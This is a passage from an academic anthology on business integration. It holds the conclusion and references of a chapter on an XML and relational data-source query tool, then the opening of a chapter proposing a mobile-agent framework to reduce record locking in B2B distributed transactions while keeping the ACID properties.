CONCLUSION The XDS software tool allows querying different types of XML and not XML—but relational— sources. Besides, it allows querying each of these sources in their native language. This is a large advantage because, in this way, it will be possible to use all the features of each source. The tool also offers a big flexibility to transform the relational data to an XML presentation, specifying different transformation schemas for the XML output. On the other side, XDSQuery, the language used to make the client requests, is an XML
Business Information Integration from XML and Relational Databases Sources
language; therefore, it will be possible to create and/or modify queries easily using standard tools like Document Object Model (DOM) (W3C, 2004a). Finally, as stated, users can define the structure of the XML output document without any later transformations using the information of the XDSSchema. In addition to these advantages, the XDS tool has been tested in real environments, always obtaining very satisfactory results. The tool has been tested using the three types of sources, an XML-Enabled RDBMS like Oracle, an XML native database like Tamino and XML documents, and even making requests that affected at the same time all these three of these types of sources. We have studied other tools in relation to obtaining information in XML format from different types of sources, relational and/or XML sources. We have shown the disadvantages of these tools in relation to our purposes. Some of them only implement part of our requirements and others do not implement them in the most efficient way. Therefore, we can conclude that the XDS tool is a good solution for obtaining XML-format data from different types of sources. That is, it is a good tool for the managerial dimension in business integration contributing to heterogeneous data integration. More than one source could be accessed in the same query; for example, to combine data from different sources. For each source, its own language is used, to be more powerful. Finally, a user can define the XML output format. All these features would be a large help for businesses, especially when they have to exchange information with other business or when they want to present information on the Web. In addition, this information could come from different sources. However, we have also exposed a characteristic that could improve our tool.
REFERENCES Apache Group. (2003). Jakarta project: DBTags tag library. Retrieved from http://jakarta.apache. org/taglibs Apache Software Foundation. (2004). Xindice. Retrieved from http://xml.apache.org/xindice/ Braganholo, V. (2002). Updating relational databases through XML views (technical report). Instituto de Informática, Univerdidade Federal Do Rio Grande do Sul. Brown, S. (2001). Professional JSP (2nd ed.). Wrox Press. Carey, M. J., Florescu, D., Ives, Z. G., Lu, Y., Shanmugasundaram, J., Shekita, E. J., & Subramanian, S. (2000). XPERANTO: Publishing object-relational data as XML. Proceedings of the International Workshop on the Web and Databases (Informal Proceedings), 105-110. Carey, M. J., Kiernan, J., Shanmugasundaram, J., Shekita, E. J., & Subramanian, S. (2000). XPERANTO: Middleware for publishing object-relational data as XML documents. VLDB Journal, 646-648. Chang, B. (2001). Oracle 9i XML handbook. Osborne-McGraw Hill. Cheng, J., & Xu, J. (2000). IBM DB2 XML Extender: An end-to-end solution for storing and retrieving XML documents. Proceedings of ICDE’00 Conference. Conrad, A. (2001). A survey of Microsoft SQL Server 2000 XML features. MSDN Library. dbXML Group. (2004). \dbXML. Retrieved from www.dbxml.com/index.html Deutsch, A., Fernandez, M.F., Florescu, D., Levy, A., & Suciu, D. (1998). XML-QL: A query lan-
1981
Business Information Integration from XML and Relational Databases Sources
guage for XML. Proceedings of WWW The Query Language Workshop (QL). Elmasri, R., & Navathe, S. (2002). Fundamentos de sistemas de bases de datos (3ª edition). Addison Wesley. Fermoso, A. (2003). XBD: Sistema de consulta basado en XML a bases de datos relacionales (PhD thesis). Facultad de Ingeniería, Universidad de Deusto. Fernández, M., Kadiyska, Y., Morishima, A., Suciu, D., & Tan, W.C. (2002). SilkRoute: A framework for publishing relational data in XML. ACM Transactions on Database Systems (TODS), 27(4). Fernández, M., Morishima, A., Suciu, D., & Tan, W.C. (2001). Publishing relational data in XML: The SilkRoute approach. IEEE Data Engineering. Fernández, M., Tan, W., & Suciu, D. (2000). Silkroute: Trading between relations and XML. Proceedings of the Ninth InternationalWorld Wide Web Conference. Fischer, P. C., & Gucht, D. V. (1984). Weak multivalued dependencies. Proceedings of the 3rd ACM SIGACT-SIGMOD symposium on Principles of database system, 266-274. Funderburk, J. E., Kiernan, G., Shanmugasundaram, J., Sheki-ta, E., & Wei, C. (2002). XTABLES: Bridging relational technology and XML. IBM Systems Journal, 41(4). IBM. (2001). IBM Net.Data for OS/2 Windows NT, and UNIX administration and programming guide, Version 7. IBM Corporation. IBM. (2002). IBM DB2 universal database. XML Extender administration and programming, version 8. IBM Corporation. Intelligent Systems Research. (2003). Merging ODBC data into XML ODBC2XML. Retrieved February, from www.intsysr.com/odbc2xml. htm 1982
Kappel, G., Kapsammer, E., & Retschitzegger, W. (2000). X-Ray: Towards integrating XML and relational database systems. Proceedings of the International Conference on Conceptual Modeling, the Entity Relation Ship Approach, 339-353. Laddad, R. (2000). XML APIs for databases: Blend the power of XML and databases using custom SAX and DOM APIs. Java World, January. Laux, A., & Martin, L. (2000). \XUpdate (working draft). Retrieved from http://exist-db.org/xmldb/ xupdate/xupdate-wd.html McBrien, P., & Poulovassilis, A. (2001). A semantic approach to integrating XML and structure data source. Proceedings of the 13th International Conference on Advanced Information Systems Engineering (CAiSE01). Megginson, D. (2004). Simple API for XML (SAX). Retrieved from http://sax.sourceforge.net/ Meier, W. (2004). eXist. Retrieved from http:// exist.sourceforge.net Melton, J. (2003). XML-related specifications (SQL/XML) (ISO-ANSI working draft). ISOANSI, September. Microsoft. (2001). SQL Server 2000: XML and Internet support. Microsoft Corp. Oracle. (2002a). Oracle 9i Release 2. Database concepts. Oracle Corp., March. Oracle. (2002b). Oracle 9i Release 2. XML API reference—XDK and Oracle XML DB. Oracle Corp., March. Oracle. (2002c). Oracle 9i Release 2. XML database developers’s guide. Oracle XML DB. Oracle Corp., October. Oracle. (2002d). Oracle 9i Release 2. XML developers’ kits guide—XDK. Oracle Corp., March.
Business Information Integration from XML and Relational Databases Sources
Pal, S., Fussell, M., & Dolobowsky, L. (2004). XML support in Microsoft SQL Server 2005. Retrieved May, from http://msdn.microsoft. com/xml/default.aspx?pull=/library/enus/dnsql90/html/sql25xmlbp.asp Pal, S., Parikh, V., Zolotov, V., Giakoumakis, L., & Rys, M. (2004). XML best practices for Microsoft SQL Server 2005. Retrieved June, from http:// msdn.microsoft.com/xml/default.aspx?pull=/library/enus/dnsql90/html/sql25xmllbp.asp Rollman, R. (2003). Optimizing XPath queries: Translate XML views into FOR XML EXPLICIT queries. SQLServer magazine, October. Roth, M. A., Korth, H. F., & Silberschatz, A. (1988). Extended algebra and calculus for nested relational databases. ACM Transactions Database Systems, 13(4), 389-417. Shanmugasundaram, J., Kiernan, J., Shekita, E.J., Fan, C., & Funderburk, J. (2001). Querying XML views of relational data. The VLDB Journal, 261-270. Shanmugasundaram, J., Tufte, K., Zhang, C., He, G., DeWitt, D. J., & Naughton, J. F. (2001). Relational databases for querying XML documents: Limitations and opportunities. The VLDB Journal, 302-314. Silberschatz, A., Korth, H., & Sudarshan, S. (1998). Fundamentos de bases de datos (third edition). McGraw-Hill. Software AG. (2003a). Introducing Tamino. Tamino version 4.1.4. SoftwareAG. Software AG. (2003b). Tamino XML Schema user guide. Tamino version 4.1.4. Software AG.
Turau, V. (1999). Making legacy data accessible for XML applications. Retrieved from http://citeseer.nj.nec.com/turau99making.html Vittory, C. M., Dorneles, C. F., & Heuser, C. A. (2001). Creating XML documents from relational data sources. Proceedings of ECWEB (Electronic Commerce and Web Technologies) 2001. Lecture notes in computer science (vol. 2115, pp. 60-70). Springer Verlag. World Wide Web Consortium. (2005a). Document Object Model (DOM). Retrieved from www. w3.org/DOM/DOMTR World Wide Web Consortium. (2005b). Document Type Declaration (DTD). Retrieved from www. w3.org/TR/REC-xml/ World Wide Web Consortium. (2005c). Extensible Markup Language (XML). Retrieved from www. w3c.org/xml World Wide Web Consortium. (2005d). Extensible Style sheet Language (XSL). Retrieved from www. w3c.org/Style/XSL World Wide Web Consortium. (2005e). XML Path language (XPath). Retrieved from www. w3c.org/TR/xpath World Wide Web Consortium. (2005f). XML schema. Retrieved from www.w3c.org/2001/ XMLSchema World Wide Web Consortium. (2005g). XQuery: A Query Languaje for XML. Retrieved from www. w3c.org/TR/xquery X-Hive Corporation. (2005). X-Hive/DB. Retrieved from www.x-hive.com
Software AG. (2003c). XQuery 4 user guide. Tamino version 4.1.4. Software AG.
This work was previously published in Adaptive Technologies and Business Integration: Social, Managerial and Organizational Dimensions, edited by M. Cunha; B. Cortes; G. Putnik, pp. 282-307, copyright 2007 by Information Science Reference (an imprint of IGI Global).
1983
1984
Chapter 6.6
A Parallel Methodology for Reduction of Coupling in Distributed Business-to-Business E-Commerce Transactions Anthony Mark Orme Athens State University, USA Letha H. Etzkorn University of Alabama, USA
ABSTRACT
INTRODUCTION
Recently, new standards for business-to-business (B2B) e-commerce transactions, to reduce extended record locking, relaxed standard database transaction properties. In this paper, we provide a parallel methodology employing a mobile/intelligent agent framework to alleviate extended record locking, while adhering to standard database transaction properties. Our methodology provides a minimum 30% reduction of record locking compared to new B2B standards.
The Internet boom of the last decade has led to the realization that business automation is possible on a wider scale than ever before. Prior to the B2B push of the 1990s, electronic data interchange (EDI) was the industry standard for business automation across organizational boundaries. EDI provided a standard set of messages that business partners used to pass data between their respective applications. The EDI solution suffered from limited reusability due to the high degree
of coupling required between applications and a high cost of implementation (Weigand, Heuvel, & Dignum, 1998), which translates to a higher cost per transaction. These factors prohibited smaller businesses from implementing EDI-based solutions (Weigand et al., 1998). A key benefit of the research in business automation is a lower transaction cost; the lowered transaction cost has been the impetus that has driven the latest B2B e-commerce research. The result of early B2B automation was the development of several proprietary B2B frameworks1 that defined a set of services to provide pairwise interoperability between two companies for integration of their enterprise applications (Ariba Inc., 2006). However, the pairwise interoperability was limited by the development of many competing frameworks and a lack of interoperability between the competing frameworks. There are many examples of B2B e-commerce transactions that parallel logistics management problems that require coordination of multiple interactions between many trading partners. These logistic management problems require distributed transaction support on relational database management systems (Riccardi, 2001) not provided in these B2B frameworks. Therefore, front-end applications provide the distributed transaction support required for many B2B and logistics management problems. If these front-end applications use traditional distributed transaction techniques, the possibility of extended record locking across organizational boundaries exists. In long-running transactions, these extended record locks may not be desirable and must be considered as a component in the cost of a B2B e-commerce transaction. Extended record locking can be illustrated with the following example: Suppose company A is building widgetA. In order to build widgetA, company A needs widgetB from company B and widgetC from company C. Suppose company B possesses exactly five widgetBs at the current time. Also, suppose company C has just sold its last widgetC and must receive a shipment from the
factory before it has new widgetCs available for purchase. A transaction goes out from company A to both companies B and C. This transaction asks to purchase a widgetB from company B and a widget C from company C. The database in company B locks the record corresponding to one of its five widgetBs. This widget will be held until the overall transaction is complete. Meanwhile, company C is unable to complete its part of the transaction, because it has not received its shipment of widgetCs. The record in company B could be locked for hours or days, until the overall transaction completes. In the meantime, several hours or a day later, another transaction request from a different customer arrives at company B. This request is for five widgetBs. Company B is unable to satisfy this request, due to the locked record for one of its widgetBs. Much of the current research on distributed, Internet–based, B2B e-commerce transactions focuses on the possibility of having transactions characterized by their long-running nature; a consequence of this is the possibility of extended record locks being held by an integrated application from an outside organization. Therefore, the autonomy of individual trading partners may be compromised (Dan et al., 2001), which may lead to a potential loss of sales under certain circumstances. Some have suggested easing the restrictions of the properties of standard transaction-based systems, “Atomic,” “Consistent,” “Isolated,” and “Durable,” known as the ACID properties (Riccardi, 2001), as a solution to the potential problem of extended record locking (Dan et al., 2001). However, easing the restrictions associated with the ACID properties is unsatisfactory in many ways. First, data anomalies may be introduced into transaction-based systems when relaxing the ACID properties (Attaluri & Salem, 2002). Second, all databases implement ACID (Riccardi, 2001); ignoring this feature limits reuse of investments, which results in achieving correctness via another method, which is therefore an additional cost. The only problem with retaining the ACID
1985
A Parallel Methodology for Reduction of Coupling
properties is the extended record locking and potential rollback of work that has been accomplished in a transaction when one system fails, when in some cases preserving the work would be preferable (Organization for the Advancement of Structured Information Standards, 2002a) (Organization for the Advancement of Structured Information Standards, 2002b). For example, suppose the “Isolated” ACID property is not being supported. This means that, for example, one transaction could read temporary data occurring during another transaction; that data might not be valid later. In a similar example to the one given earlier, suppose company C buys more widgetCs to replenish its stock. It requests these widgetCs from company D and at the same time requests some widgetDs from company D because there is a discount if you buy both widgetCs and widgetDs at the same time. It initially receives some widgetCs, and those enter its database, but the entire transaction with company D has not yet completed. During this time, the transaction from company B comes through. Company B’s request (running at company C) can see that there are widgetCs available, so it provides these widgetCs to company B. Unfortunately, the transaction with company D fails, since no widgetDs are available, and company C is unwilling to pay a higher price for widgetCs. Then company C has no widget Cs after all, and has erroneously sold a widgetC that it does not possess to company B. We examine the possibility that B2B distributed transactions should adhere to the ACID properties for transaction-based systems. Also, we propose a mobile/intelligent agent2 framework that supports B2B, e-commerce, distributed transactions with a reduced record locking time compared to traditional distributed ACID-based transactions. As we mentioned earlier, a software framework provides a partial software solution. It defines the architecture for software systems that are further defined by the user to apply to a particular problem. Our methodology exploits
1986
the use of a parallel approach versus a linear sequential approach to B2B transactions. We use mobile/intelligent agents to implement the parallelism of ourapproach. A parallel methodology such as the one described in this paper breaks a task into multiple subtasks, each of which can be executed simultaneously. Our framework exploits the use of mobile agents (MA) working in parallel as one mechanism to achieve the reduction in record locking time. Trading partner agreements (TPA) are used to enable MAs to negotiate and finalize interactions with individual vendors. For the purpose of this paper we use the term transaction to define a data manipulation in which a state change of one or more tuples (rows) in one or more relations (tables) occurs in a database. An autonomous transaction is a transaction that occurs on a single system. A distributed transaction refers to a transaction that effects a change on more than one system, meaning data changes on more than one database. Finally, we introduce the term trading partner interaction to encompass all of the messaging capabilities required in order to achieve a transaction between trading partners; therefore, a distributed transaction is a set consisting of one or more trading partner interactions. The remainder of this paper is organized as follows: first, the background necessary to understand the relationship between transactions and distributed transactions and a standard twophase commit protocol3 (Riccardi, 2001) with respect to the ACID properties (Riccardi, 2001) is provided. Then the ACID properties are also described. This includes a brief description of B2B transactions and ebXML (a new standard for B2B distributed transactions). The Methodology section outlines our architecture to support a B2B distributed transaction that adheres to the ACID properties and reduces record locking. Also in the Methodology section are the results of our research when applied to a specific transaction scenario. In the Discussion section we discuss the results. Finally, a conclusion to our research
A Parallel Methodology for Reduction of Coupling
is presented and topics for further investigation are outlined.
BACKGROUND The background section is divided into the following subsections: the first explores the ACID properties and the two-phase commit protocol, and their relationship to autonomous transactions and distributed transactions. The next section provides a look at B2B transactions as they relate to our architecture. After that, the last section provides an overview of a few core components of ebXML and their relation to business. .
Transaction Properties Although the concept of a transaction is not unique to a database system, the ACID properties and two-phase commit protocol provide the basis for database systems transactions. The ACID properties that follow provide a level of certainty and assurance on the outcome of a transaction and define a set of restrictions placed on the data. •
•
•
•
Atomic: A transaction must execute exactly once and must be atomic—either all of the work is done or none of it is. Consistent: A transaction must preserve the integrity constraints of data, transforming one legal (consistent) state of data into another legal (consistent) state of data. Isolated: A transaction must be a unit of isolation, which means that concurrent transactions should behave as if each were the only transaction running in the system. Durable: If a transaction commits, the system guarantees that its updates can persist and will not be undone.
These ACID properties have formed a basis for transactions in both autonomous transactions and distributed transactions. These properties
guarantee transaction system developers that transaction-related data adhered to well-defined semantics, and that the image of the data before, during, and after the transaction meets the defined criteria for each of the ACID properties. The Consistent and Isolation properties define a set of rules on both the data state and the visibility of data in the scope of a transaction. Both the Consistent and Isolation properties are similar in an autonomous and a distributed transaction. The Consistent property assures that, during a transaction, tuples modified by an insert, update, or delete statement in the scope of a transaction must be in agreement with the constraints that govern the validity of the relationships among the data defined by the assumptions of the designers of this system. The Isolation property makes assurances on the visibility of the changes made to a tuple with respect to other transactions. In other words, the Isolation property governs the readability of tuples by other transactions, when one transaction has modified that tuple in its scope previously. In most modern database management systems (DBMS), the implementation of the Isolation property provides different levels of granularity with respect to the visibility of modified data between transactions. Table 1 Summarizes the ANSI isolation levels (American National Standard Institute, 1992) with respect to known data anomalies. Table 1 shows three data anomalies, Dirty Read, Non-Repeatable Read, and Phantom Read, that are used to differentiate the four isolation levels of Read Uncommitted, Read Committed, Repeatable Read, and Serializable. Each data anomaly represents a potential problem for transactions in terms of data changing in the scope of a transaction. A dirty read allows a transaction to read uncommitted data from another transaction. A non-repeatable read occurs when a transaction rereads data committed by another transaction and sees the changes. A phantom reads occurs when a transaction executes a query again and sees data inserted by another transaction. Both
the non-repeatable read and phantom read are point-in-time correct, meaning any read sees only committed data from other transactions. However, on the other hand, a dirty read allows data to be viewed, which may eventually be rolled back by the modifying transaction. Each of these data anomalies may affect transaction logic by potentially supplying seemingly inconsistent views of data as the transaction progresses. The strictest isolation level, serializable, must execute in such a way that transactions appear to be executing one at a time (serially) rather than concurrently. Concurrent transactions executing in serialized mode can only make database changes that they could have made if the transactions ran one after the other. Concurrent transactions executing in serializable mode require record locking in each concurrent transaction and the DBMS must allow a transaction to view all tuples in the database, as they were when the transaction started. A serializable isolation level guarantees that none of the data anomalies can occur in the scope of a transaction, at the cost of high overhead to make concurrent transactions appear to execute one at a time. At the other end of the spectrum, a read uncommitted transaction requires less overhead than a serializable transaction; however, this reduction in overhead allows all anomalies to occur in the scope of a transaction. Most DBMS systems opt for a commonly accepted default isolation level of read committed, which allows the possibility of both a non-repeatable read and phantom read, but does not allow a transaction to
1988
Non-Repeatable
read or modify uncommitted data from another transaction. It is important to note that the length of the record locking does not define the isolation levels of a transaction; they are defined in terms of the possible data anomalies that may occur in the scope of a transaction. Therefore, a DBMS is free to implement these isolation levels as it sees fit, using record locking as a mechanism to achieve these different isolation levels. The durable and atomic properties define rules for implementation that guarantee the state of the data with regard to the transaction as a single unit. The durable property assures that once change to any tuple in an autonomous or distributed transaction is made permanent, the implementation guarantees these changes even in the event of a system failure. The guarantee of the Atomic property assures that all changes made to any tuple can be made permanent (committed) or undone (rolled back) in an all-or-nothing manner. A transaction with regard to the state of the data is defined as a logical unit or work in which tuples are modified, and these modifications are either all committed or rolled back. In an autonomous transaction the Atomic property defines a relationship between individual insert, update, and delete statements; therefore all statements must be able to be made permanent or undone as a unit. Distributed transactions have additional requirements to ensure the atomicity property; all participants need to be assured as to the final outcome of the transaction.
A Parallel Methodology for Reduction of Coupling
The two-phase commit protocol is a standard that provides distributed transaction coordination. The coordination is achieved by defining one system as the distributed transaction coordinator (DTC), and the other participants become resource managers (RM). Attaluri and Salem (2003) provide a detailed account of the two-phase commit protocol; in general, there are a series of messages that are passed between the DTC and the RMs that demarcate a transaction, and allow a transaction to progress towards a finalized state, either committed or aborted. The distributed two-phase commit provides the mechanism for each RM to assure that its data state is consistent with respect to the finalized state of the distributed transaction. The DTC and RMs work together via the two-phase commit protocol to assure the atomicity and consistency properties; however, the Consistent, Isolation, and Durability properties are generally considered the responsibility of the RMs to assure within their local context. The two-phase commit has two distinct phases: •
•
Prepare Phase: Prepare phase is where the DTC requests that all RMs will promise to commit or rollback the transaction. All participants respond to the DTC that they are prepared or not prepared. Commit Phase: Commit phase is where the DTC asks all RMs to commit the transaction.
If all participants cannot prepare or there is a system component failure, the coordinator asks all databases to roll back the transaction.
B2B TRANSACTIONS One B2B transaction approach popularized during the Internet expansion was the concept of the B2B frameworks. These B2B frameworks took a services-oriented approach to providing in-
teroperability between trading partners that have implemented the same B2B framework. Several competing frameworks have been developed such as eCo, commerce XML (cXML), and RosettaNet; each provides a solution that allows businesses to take advantage of e-commerce transactions. Business partners wishing to benefit from a B2B framework would integrate their enterprise applications as shown in Figure 1. Several advantages have been realized in these B2B frameworks, such as real-time access products and services. However, as a whole, B2B frameworks do not address interoperability between competing frameworks. The lack of interoperability between frameworks requires that front-end logistics management applications provide distributed transaction support to achieve an atomic transaction. The application acts as the DTC performing the synchronization task for a distributed transaction. A linear sequential approach to transaction management is used to accomplish the individual interactions with each trading partner participating in the distributed transaction. As with its predecessor, EDI, B2B framework messaging facilities are large and loaded exclusively for an individual trading partner interaction. Trading partner interactions are handled on an individual basis: one after another all requirements for the distributed transaction are fulfilled. This linear progression coupled with the ACID properties form a basis for the problem of extended record locking. The isolation property guarantees that no transaction can see the effect of another’s transaction before the distributed transaction comes to a final state. Therefore, the isolation property requires each trading partner to hold locks on records being updated until the distributed transaction is complete. These locks are held indefinitely on a trading partner’s system as the application moves on to the next trading partner while the distributed transaction progresses. The Atomic property, when applied to a distributed transaction, requires that all trading partners that participate come to an agreement on the final state of the distributed
transaction. The distributed transaction is either committed or aborted based upon the two-phase commit protocol. If all trading partners acknowledge that they are in a prepared state, the logistics management application acting as the DTC signals each trading partner to commit; otherwise, it sends the signal to abort. When the trading partner commits or aborts its respective transaction; the record locks are released and the effects of the distributed transaction become visible to other applications. This linear progression approach follows from a mindset based on modular sequential programming techniques. It is this linear progression that is the potential cause of extended record locking. Therefore, further research based on a nonsequential and nonlinear paradigm is needed to provide real-time collaboration in the e-commerce market.
1990
ebXML Core Components The Organization for the Advancement of Structured Information Standards (OASIS) is a global consortium that drives the development, convergence, and adoption of e-business standards (OASIS, 2002a). OASIS and the United Nations jointly sponsor ebXML, a global framework for e-business data exchange. In the past (for up to 20 years), most large companies have used EDI. As discussed earlier in the introduction, EDI is management intensive and also requires expensive software. This puts EDI out of reach for many smaller companies (Weigand et al., 1998). More recently, the advance of the Internet has made lower cost, Internet-based, e-business solutions popular. Many early Internet e-business solutions were proprietary solutions expressed in a format called Extensible Markup Language (XML). XML
A Parallel Methodology for Reduction of Coupling
is a simple information exchange format and does not have, in itself, any e-business capabilities, so each new e-business solution based on XML alone was a unique solution, unstandardized. Thus, ebXML is intended to solve two problems. It replaces the high cost of EDI with a relatively inexpensive Internet-based solution. It also addresses the spread of incompatible XML-based B2B frameworks. One way ebXML addresses these incompatibilities is by defining a set of core components that are reusable across all industries. OASIS (2002b) contains a complete reference for all core components of ebXML. A TPA, developed by IBM, defines how trading partners interact by defining the general contract terms and conditions; participant roles (buyers, sellers); communication and security protocols; and business processes (Dan et al., 2001). Therefore, the XML-based TPA documents capture the essential information upon which trading partners must agree in order for their applications and business processes to communicate. The specification for a TPA (Dan et al., 2001) includes: • •
•
• • •
•
Identification to uniquely identify the TPA document, and the parties; Communication to specify the transport protocol(s), electronic addresses of the parties; Security, to define the certificates used for authentication, including no repudiation, and a digital envelope; Invocation-independent properties, for example, the valid duration of the TPA; Data definition for describing formats of the data being passed around; Role definition that describes each of the roles specified in the TPA filled by specific parties; Action list to describe the requests each party can issue to the other. These actions are the independent units of work (The action definitions define the associated message
• • •
flows between the invoker and the service provider, responsiveness, failure handling, and other attributes.); Sequencing rules to describe valid action invocation sequences in each party; Global properties to describe default properties of various fields in the TPA; and Comments to describe handling of disputes, termination of the TPA as a whole, and other exceptional conditions
One core component of ebXML, the Collaboration Protocol Agreement (CPA), automates the technical aspects of a TPA. In ebXML, all trading partners publish a Collaboration Protocol Profile (CPP) that states a basic description of the ebXML business processes, as defined by an industry that it supports, together with the industry’s e-business systems points of access and technologies. Companies developing a CPA will match the business process they support to prospective trading partners. The CPA allows trading partners to agree on a set of common processes and the messages that need to be exchanged to accommodate these business processes. Therefore, the CPA provides for the automatic generation of the TPA. Another initiative of ebXML was to address distributed B2B transactions in a heterogeneous environment, focusing on the extended record locking across organizational boundaries in long–running, distributed transactions. The longrunning transaction is defined by (Dan et al., 2001) as a long-running conversation in which trading partners negotiate and create an electronic contract that stipulates the terms of the transaction. The scope of the transaction state has been broadened to encompass requirements and semantics of the state of a business transaction as a measure of the transaction’s progress and outcome. A key benefit of this approach is that it provides an extensible model of a transaction that is well suited for the advance transaction models, such as Flexible transactions, Interoperable transactions, and Mobile transactions. Here, “model” refers to a
1991
A Parallel Methodology for Reduction of Coupling
methodology or sequence of operations. Although other benefits attributed to the ebXML approach include a solution for extended record locking, the ebXML approach does not define a transaction based upon standard ACID properties. The ebXML solution is a heterogeneous solution that does not place requirements on the RM as to the state of its data during the scope of the transaction. The result of not basing a transaction on the state of its data has an effect on the atomicity and isolation properties of ACID. In ebXML, atomicity in a transaction can no longer be preserved via the standard two-phase commit protocol. The two-phase commit relies on specific constraints placed on the state of transactional data via the protocol during the transaction. The ebXML solution utilizes a two-phase agreement protocol, which is much like the two-phase commit protocol, in that it coordinates the messaging required to allow a contractual agreement to be reached as to the outcome of the transaction. The agreement on the outcome of the distributed transaction is more contractual in nature, via the TPA, rather than being tied to transactional data states as in the standard two-phase commit protocol. Research had suggested relaxing the isolation property of ACID as an appropriate procedure in reduction of record locking (Weigand, Verharen, Dignum, 1997). In the ebXML solution there exists no guarantee on the isolation property of the transaction data in the scope of a transaction. This lack of isolation in the ebXML solution is by design and is directly attributed to the fact that an ebXML implementation makes no requirements on RMs as to its’ data state during a transaction.
METHODOLOGY This section provides details of our mobile/intelligent agent framework: the goal of the framework is to directly address the issue of extended record locking by removing the linear progressive nature of current solutions to B2B distributed transac-
1992
tion (described in the background section). As mentioned in the introduction, a MA is software that moves itself from place to place in a network. An intelligent agent (IA) is software that has a particular goal and can act autonomously in certain situations. Our research shows that removing this linear progression substantially reduces the average record locking time of the B2B distributed transaction. The framework uses a two-phase commit protocol (Attaluri & Salem, 2002) to guarantee the atomicity property of the transaction. First, we provide an architectural overview of the framework and describe for each component its general properties as they relate to the business transaction. The following section details a typical trading partner interaction.
Mobile/Intelligent Agent Framework First, we formalize the trading partner interaction to assure that this process is complete and meets the requirements of the business transaction. Weigand et al. (1997) formalize the interaction process between supplier and consumer into the following four stages. 1. 2. 3. 4.
Inquiry and negotiation stage Contractual stage Fulfillment stage Satisfaction stage
We have adopted this model as a basis for trading partner interaction in our framework. Our inquiry and negotiation stage is a set of messages that facilitate an initial understanding of the scope and parameters of the trading partner interaction. This stage is the electronic counterpart of a bartering system in which humans interact to determine the parameters of a trade. The contractual stage provides a mechanism for an e-document exchange that provides all the e-documents necessary to finalize the business interaction. The contractual phase is the electronic
A Parallel Methodology for Reduction of Coupling
counterpart to a paper trail. The fulfillment stage actually provides the business transaction with the ability to exchange documents that state the transaction is completed and that resources have been allocated on each side to provide physical services. The satisfaction stage is a feedback mechanism design for process improvement. The TPA aids the MA to conduct the interactions necessary to accomplish the first three stages in the business transaction. How this interaction model is implemented in our mobile/intelligent agent framework is discussed further. Our mobile/intelligent agent framework design addresses the need to reduce record locking without relaxing the ACID properties of transaction-based systems. Although (Dan et al., 2001) points out that we should not make assumptions on behalf of a trading partner’s abilities, for many areas such as e-banking, the need for a trading partner to ensure that a transaction has truly completed as required leads to a desire for more insight into a trading partner’s capabilities. Traditionally, having a trading partner implement the ACID properties was how such assurance was achieved.
This architecture assumes that each trading partner provides an interface to its enterprise applications and that the trading partners’ systems are capable of ACID transactions. The focus of this research is to show that a reduction in record locking is possible for long-running distributed transactions without relaxing the ACID properties. This reduction in record locking is accomplished by allowing a set of MAs to work in a parallel manner to achieve each trading partner interaction required for the B2B distributed transaction. Our mobile/intelligent agent architecture, shown in Figure 2, has the following components: IA, MA, TPA(s), and a host execution environment (HEE). In the business transaction the IA acts on behalf of the purchaser to fulfill all of the requirements of the distributed transaction. The purchaser describes, through a front-end application, the requirements for all interactions with each trading partner that are contained in the transaction. The IA uses ebXML CPAs ) to match the services needed by potential trading partners. When all requirements have been matched with potential trading partners, the
Figure 2. Mobile /intelligent agent framework IA
HEE MA
MA
MA
TPA
TPA
TPA
RM
RM
RM Enterprise interface
Enterprise interface
Enterprise interface
1993
A Parallel Methodology for Reduction of Coupling
IA spawns a set of MAs, one for each interaction with a potential trading partner. These MAs are spawned to a shared distributed memory where each MA proceeds autonomously with its task. Each MA uses the TPA to carry out the interaction with this trading partner. The use of MAs allows us to remove the linear sequential aspect of most distributed B2B interactions. The parallel execution of MAs provides a significant improvement over sequential transactions.
Mobile/Intelligent Agent Framework Business Transaction Flow
P.O. Request P.O. Send
This section details the transaction messaging required to allow an MA, working autonomously, to successfully complete a trading partner interaction. The IA creates the MA to conduct an individual trading partner interaction. The MA interacts with the enterprise application interface of the specified trading partner. The MA acting autonomously must carry out all stages of the trading partner interaction model defined in Figure 3. The trading partner business interaction model includes the following stages: initial/negotiation, contractual, and fulfillment.
Fulfillment Stage
Records Locked P.O. Received Commit
Records Unlocked
Enterprise Application Interface Mobile Agent
Implementation, Testing, and Results Our mobile/intelligent agent framework does not specify implementation-specific details for its core components; therefore, there are many ways to implement each component. We chose Sun Microsystems Java tm as the language for the framework core components’ implementation of the MA and the enterprise application interface. Sun Microsystems Jini tm is used as the distributed computing platform to facilitate the required message passing between all components. The tested framework also uses Oracle 9i DBMS as the chosen platform to represent the implementation of a trading partner’s enterprise application storage. Oracle 9i is capable of providing the requirements of the ACID properties in
1994
a distributed transaction. The Oracle XA library conforms to the X/Open Distributed Transaction Processing (DTP) software architecture’s XA interface specification. The Oracle XA library is an external interface that allows distributed transactions to be coordinated by a transaction manager. In this section we describe the specific details of the test performed to quantify our hypothesis that on average the mobile/intelligent agent framework will significantly reduce record locking when compared with a linear progressive implementation. A description of the mobile/intelligent agent framework implementation used to test our hypothesis is provided for completeness.
A Parallel Methodology for Reduction of Coupling
Testing the hypothesis requires a test scenario that simulates each method of record locking, while capturing the amount of time records are locked on each trading partners’ system. The focus of each test scenario is to simulate all aspects of the specific approach that have an impact on the length of time records are locked in the distributed transaction without relaxing the ACID properties. Therefore, for the purpose of this analysis, the implementation of the linear progressive method and the mobile/intelligent agent framework need only address the record locking: other higher level B2B interactions are irrelevant for the purpose of this experiment. The implementation that follows is intended to simulate all the message-passing requirements between the IA, MA, and a trading partners’ enterprise application necessary to implement an XOPEN two-phase commit. The simulation of the linear progressive method for distributed B2B transactions uses the native ability of the Oracle 9i database to perform distributed transactions, as it captures the true essence of the linear progressive approach. The simulation uses the Oracle database’s ability to perform a two-phase commit, in which one database acts as the DTC while the remaining databases act as RMs in the transaction. To simulate the linear progressive approach, a Structural Query Language (SQL) script is invoked on one database server. The SQL script locks records on each database by performing an update to a set
